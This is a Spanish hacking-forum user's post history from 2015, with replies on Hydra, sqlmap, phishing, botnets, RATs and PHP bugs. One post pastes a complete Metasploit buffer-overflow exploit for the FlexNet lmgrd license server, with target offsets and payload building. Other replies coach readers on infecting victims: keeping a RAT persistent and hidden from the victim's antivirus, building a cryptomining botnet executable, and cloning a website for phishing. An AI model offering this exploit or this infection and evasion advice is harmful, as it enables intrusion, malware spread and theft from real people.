Podrías poner la parte de código en la que te da error?
Un saludo.
Un saludo.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#1121
Dudas y pedidos generales / Re:Bash, help- nombre variable con variables
Junio 27, 2015, 11:44:26 AM #1122
Dudas y pedidos generales / Re:Dirigir trafico de la red a una web clonada
Junio 27, 2015, 11:43:24 AM #1123
Dudas y pedidos generales / Re:Control administrador en Samp
Junio 27, 2015, 11:42:11 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola,
en el samp los administradores me controlan. Como me puedo hacer intocable? Hay un script que pueda hacer?
Gracias
Doy por hecho de que con Samp te refieres a San Andreas Multiplayer
Creo que por tu pregunta, no tienes mucha idea de informática en general, no solo hay un "samp oficial" (de hecho creo que no hay ninguno oficial), hay muchos servidores en el mundo a los que te puedes conectar por tanto, deberías aprovechar una vulnerabilidad del servidor al que te conectas (en el que juegas).
En definitiva, no hay ningún script milagroso ni mucho menos programas que te hacen administrador.
Un saludo.
#1124
Dudas y pedidos generales / Re:Que son estos campos de un BOTNET
Junio 27, 2015, 11:38:28 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Lo pongo así por que se ve mas grande, si lo pego directamente en este post, se ve chico y no se distingue...
Si la pones aquí y le das doble click se amplia
Te intentaré explicar los campos (bajo mi punto de vista y sin saber que botner es)
Citar
Enable ---> con un tick lo marcas o no(por defecto viene CON tick)
Save information ---> Con un tick lo marcas o no (por defecto viene SIN tick)
Pool URL:
Worker username:
worker password:
threads:
save As: por defecto viene: winsvchost.exe
Y abajo del botnet pone un boton llamado: BUILD
¿ese boton lo que hace es crear un .exe como los RAT?
Enable ---> con un tick lo marcas o no(por defecto viene CON tick)
Doy por hecho de que es para activarla o desactivarla, obviamente dejalo marcado.
Save information ---> Con un tick lo marcas o no (por defecto viene SIN tick)
Como ha dicho Payasako, puede ser o bien para guardar los campos para generar otro exe de manera más sencilla o bien, que guarde los datos que consiga recopilar...
Worker username: Tu usuario para iniciar sesión.
Worker password: Tu contraseña para iniciar sesión.
Threads: Supongo que será los hilos que puede ejecutar a la vez, cuanto mayor sea el número, más se ejecutará (obviamente, también consume más recursos).
Save as: Mmmm... creo que es el nombre del proceso que tendrá, aunque también puede ser el nombre con el que se generará el exe (cosa que dudo, pues sería una opción tonta, ya que se puede renombrar de forma sencilla).
CitarY abajo del botnet pone un boton llamado: BUILD
¿ese boton lo que hace es crear un .exe como los RAT?
Obvio... Si no, como quieres infectar?
Un saludo y espero haberte ayudado ^^
#1125
Off Topic / Re:Cagadas informaticas
Junio 27, 2015, 11:24:39 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Esto pasó en Noviembre del año pasado aproximadamente:
Recuerdo cuando intenté instalar Ubuntu como mi 2do SO. Al lado tenía un W8.1 con más de 120GB de juegos, fotos, e info.
Al estar en la pantalla de las particiones en el instalador, podría jurar que dejé W8.1 intacto, y que había seleccionado la partición libre recién hecha para Ubuntu.
Y bueno, después de reiniciar, estaba mirando el espacio libre del disco en Ubuntu para ver que tanto afectaba. Tenía todo el disco libre. Windows había desaparecido. No sabía si llorar o llorar.
#1126
Dudas y pedidos generales / Re:[DUDA] Debolver contenido legible desde objeto en php
Junio 23, 2015, 06:31:58 AM
Mmm no he mirado mucho tu código (estoy desde el móvil), pero encuentro aquí un fallo:
Código: php
$post siempre devolverá el valor de la última posición del foreach.
Esto es debido a que la variable $post vale "<h2>{$data[0]}</h2>"; por tanto, al igualarlo y no concatenarlo ni nada por el estilo, lo que devuelve es una única entrada.
Lo que debes hacer es guardarlo como array (y en diferentes posiciones) o bien, concatenar los anteriores valores $post .= "<h2>{$data[0]}</h2>";, esto último es un poco chapuzas, pero puede servirte dependiendo de como utilices tu aplicación.
Prueba y me cuentas
Saludos.
$totalpost = $this->grab_entrie("dir/path/");
foreach($totalpost as $element){
$data = file("dir/path/".$element);
$post = "<h2>{$data[0]}</h2>";
unset($data);
}
return($post);$post siempre devolverá el valor de la última posición del foreach.
Esto es debido a que la variable $post vale "<h2>{$data[0]}</h2>"; por tanto, al igualarlo y no concatenarlo ni nada por el estilo, lo que devuelve es una única entrada.
Lo que debes hacer es guardarlo como array (y en diferentes posiciones) o bien, concatenar los anteriores valores $post .= "<h2>{$data[0]}</h2>";, esto último es un poco chapuzas, pero puede servirte dependiendo de como utilices tu aplicación.
Prueba y me cuentas
Saludos.
#1127
Dudas y pedidos generales / Re:Dirigir trafico de la red a una web clonada
Junio 21, 2015, 11:53:45 AM
Creo que lo más sencillo sería utilizar ghost phisher para clonar la página y redirigir el dominio a tu IP desde el el archivo Hosts
Saludos.
Saludos.
#1128
Bugs y Exploits / Re:XSS and MySQL FILE
Junio 20, 2015, 08:25:30 AM
Muy buen aporte Black_melen, te he puesto bien las imágenes, pues habías puesto la dirección de imgur y no propiamente la de la imagen (con su extensión).
Te dejo +1 y espero seguir viendo aportes tuyos
saludos.
Te dejo +1 y espero seguir viendo aportes tuyos
saludos.
#1129
Hacking / Re:[D.O.S] Smurf Attack
Junio 19, 2015, 02:11:49 PM #1130
Dudas y pedidos generales / Re:Dudas con Hydra
Junio 19, 2015, 02:08:43 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
estaba con hydra en el modo grafio atacando el stmp.gmail.com single target verbose puerto 465 en username la direccion y luego en password mi dirccionario y ya
Podrías poner el comando que utilizas y no describirlo...
De todas formas, como dice Snifer, falsos positivos, posiblemente porque tu comando esté mal.
Saludos.
#1131
Dudas y pedidos generales / Re:[DUDA] Pentesting a Web -Sqlmap
Junio 18, 2015, 05:15:02 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
sqlmap.py -u You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login --dbms=MYSQL --level=5 --risk=3 --data="MÉTODO_POST" --dbs --random-agent --tamper=space2comment.py --user-agent=sqlmap
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Revisa el parámetro --data y elimina los parámetros que no sean necesarios para tu inyección, luego revisa si inyecta.
Para el parámetro --data recuerda que se saca así: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos.
#1132
Dudas y pedidos generales / Re:Dudas con Hydra
Junio 18, 2015, 05:10:29 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola compañeros al realizar pruebas con este programa para sacar pruebas logre sacar varios passwords con algunos direccionarios
simples , sin embargo no me loogea con ese password
a que es debido?
Seguramente los parámetros estén mal, revisalo bien.
Un saludo.
#1133
Dudas y pedidos generales / Re:ATAQUE DDoS A MI ROUTER
Junio 18, 2015, 05:08:52 PM
Simplemente revisa las conexiones entrantes a tu router y bloquea las que no sean legítimas...
Cambia el usuario y la contraseña del panel del router y cierra el acceso desde fuera de la red.
Revisa la opción de Firewall y NAT pues te habrán puesto la redirección.
Lo mejor que puedes hacer es restaurarlo de fabrica, cambiar los datos de acceso y cerrar las conexiones externas de la red
Saludos.
Cambia el usuario y la contraseña del panel del router y cierra el acceso desde fuera de la red.
Citartambien me bloqueo la entrada a páginas web ya que cuando intentaba entrar a google me redirigia a la administración de router
Revisa la opción de Firewall y NAT pues te habrán puesto la redirección.
Lo mejor que puedes hacer es restaurarlo de fabrica, cambiar los datos de acceso y cerrar las conexiones externas de la red
Saludos.
#1134
Tutoriales y Manuales de Malwares / Re:Ingeniería inversa APK
Junio 18, 2015, 05:00:20 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginSi fuese un "Copy&Paste" tendría los créditos en el post y respecto al olvidaste las imagenes, yo las veo perfectamente. Suelo aceptar cualquier tipo de crítica pero esto yo creo que es comentar tonterías.
Esto es un Copy&Paste u olvidaste las imagenes.
Un saludo
Veo perfectamente las imágenes, además, creaste la apk con el nombre de la comunidad, por tanto 0 Copy&Paste
Lord, deberías de mirar bien el post antes de escribir todo lo que piensas e intentar desprestigiar el trabajo de otros.
Gran trabajo @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#1135
Dudas y pedidos generales / Re:Duda con servicio FLEXLM y exploit para el mismo
Junio 18, 2015, 06:52:36 AM
Revisa este exploit para metasploit, de todas formas dependerá de la versión que utilice
Código: c
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'FlexNet License Server Manager lmgrd Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in the FlexNet
License Server Manager.
The vulnerability is due to the insecure usage of memcpy
in the lmgrd service when handling network packets, which
results in a stack buffer overflow.
In order to improve reliability, this module will make lots of
connections to lmgrd during each attempt to maximize its success.
},
'Author' =>
[
'Luigi Auriemma', # Vulnerability Discovery and PoC
'Alexander Gavrun', # Vulnerability Discovery
'juan vazquez', # Metasploit module
'sinn3r' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '81899' ],
[ 'BID', '52718' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-052/' ],
[ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 4000
},
'Platform' => 'win',
'Targets' =>
[
[ 'Debug', {} ],
[ 'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',
{
'Offset' => 10476,
'ShellcodeOffset' => 5504,
'Ret' => 0x0047d01f # ppr from lmgrd.exe
}
],
[ 'Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3',
{
'Offset' => 7324,
'ShellcodeOffset' => 2332,
'Ret' => 0x004eda91 # ppr from lmgrd.exe
}
],
[ 'Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3',
{
'Offset' => 7320,
'ShellcodeOffset' => 2328,
'Ret' => 0x004eb2e1 # ppr from lmgrd.exe
}
],
],
'DefaultTarget' => 1,
'DisclosureDate' => 'Mar 23 2012'))
register_options(
[
Opt::RPORT(27000),
OptInt.new('Attempts', [ true, 'Number of attempts for the exploit phase', 20 ]),
OptInt.new('Wait', [ true, 'Delay between brute force attempts', 2 ]),
OptInt.new('Jam', [ true, 'Number of requests to jam the server', 100 ])
], self.class)
end
def header_checksum(packet)
packet_bytes = packet.unpack("C*")
checksum = packet_bytes[0]
i = 2
while i < 0x14
checksum = checksum + packet_bytes[i]
i = i + 1
end
return (checksum & 0x0FF)
end
def data_checksum(packet_data)
word_table = ""
i = 0
while i < 256
v4 = 0
v3 = i
j = 8
while j > 0
if ((v4 ^ v3) & 1) == 1
v4 = ((v4 >> 1) ^ 0x3A5D) & 0x0FFFF
else
v4 = (v4 >> 1) & 0x0FFFF
end
v3 >>= 1
j = j - 1
end
word_table << [v4].pack("S")
i = i + 1
end
k = 0
checksum = 0
data_bytes = packet_data.unpack("C*")
word_table_words = word_table.unpack("S*")
while k < packet_data.length
position = data_bytes[k] ^ (checksum & 0x0FF)
checksum = (word_table_words[position] ^ (checksum >> 8)) & 0x0FFFF
k = k + 1
end
return checksum
end
def create_packet(data)
pkt = "\x2f"
pkt << "\x00" # header checksum
pkt << "\x00\x00" # data checksum
pkt << "\x00\x00" # pkt length
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt << data
pkt[4,2] = [pkt.length].pack("n")
data_sum = data_checksum(pkt[4, pkt.length - 4])
pkt[2, 2] = [data_sum].pack("n")
hdr_sum = header_checksum(pkt[0, 20])
pkt[1] = [hdr_sum].pack("C")
return pkt
end
def jam
pkt = create_packet("")
datastore['Jam'].times do
connect
sock.put(pkt)
disconnect
end
end
def exploit
i = 1
while i <= datastore['Attempts'] and not session_created?
print_status("Attempt #{i}/#{datastore['Attempts']} to exploit...")
do_exploit
sleep(datastore['Wait'])
i = i + 1
end
if not session_created?
print_error("Exploit didn't work after #{i} attempts")
end
end
def do_exploit
t = framework.threads.spawn("jam", false) { jam }
my_payload = payload.encoded
header_length = 20 # See create_packet() to understand this number
pkt_data = ""
if target.name =~ /Debug/
pkt_data << "a" * (65535 - header_length)
else
pkt_data << "a" * target['ShellcodeOffset']
pkt_data << my_payload
pkt_data << rand_text(target['Offset']-target['ShellcodeOffset']-my_payload.length)
pkt_data << generate_seh_record(target.ret)
pkt_data << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5000").encode_string
pkt_data << rand_text(65535 - pkt_data.length - header_length)
end
pkt = create_packet(pkt_data)
connect
sock.put(pkt)
handler
disconnect
end
end #1136
Dudas y pedidos generales / Re:[DUDA] Con Pentesting a una Web
Junio 18, 2015, 06:49:25 AM #1137
Dudas y pedidos generales / Re:Preguntas :C
Junio 14, 2015, 06:43:36 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Estoy que usando el spy-net v 1.7 con el crypter de matrix haber como me va sin el antivirus instaldo gracias por su ayuda
Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,
Recuerda configurar el servidor de tu RAT con persistencia y startup, para que cuando se vuelva a iniciar el pc, se ejecute.
Recuerda también que los crypter's que te ha pasado @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no son fud, y al ser públicos se queman muy rápido y el AV de tu victima detectará tu server en un par de días como mucho.
En cuanto al binder, como dicen, siempre será un .exe, aunque dependiendo del archivo que utilices para camuflarlo, quedará mejor o no, para ello, te recomiendo que utilices algún crypter que posea esa función y no un binder, pues si utilizas binder + crypter por separado, corres bastante riesgo de que se rompa tu servidor.
Te recomiendo que hagas indetectable tu mismo tu propio servidor, sin utilizar crypters públicos (a no ser que no te importe actualizar manualmente tu servidor cada día o cada dos como mucho) o uses algún crypter premium: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos y espero haber resuelto tus dudas.
#1138
Análisis y desarrollo de malwares / Re:Crypter Key Public ByRoda
Junio 14, 2015, 06:23:49 AM
La contraseña funciona, debéis recordar que el orden al descifrar la password no es el mismo que al cifrarlo 
Saludos.
Saludos.
#1139
Seguridad web y en servidores / Re:Backdooring con PHP.
Junio 14, 2015, 06:13:36 AM
Muy buen aporte Payasako, sobre todo para los que se inician y no saben PHP por tanto, tampoco hacer este tipo de backdoors
Saludos.
Saludos.
#1140
